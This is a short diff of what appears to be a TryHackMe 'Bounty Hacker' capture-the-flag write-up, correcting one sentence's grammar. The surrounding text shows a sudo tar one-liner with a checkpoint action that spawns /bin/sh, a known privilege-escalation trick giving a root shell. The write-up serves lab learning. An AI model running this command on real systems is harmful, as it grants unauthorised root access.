clickmimo/clickmimo.github.io/_posts/thm/2022-1-24-bounty-hacker.md

 ![gtfobins](/assets/images/thm/bounty-hacker/gtfobins.png)

-Yes, it is simple as that, just copy the command and execute it and you will have root acces.
+Yes, it is as simple as that, just copy the command and execute it and you will have root acces.

 ```
 sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh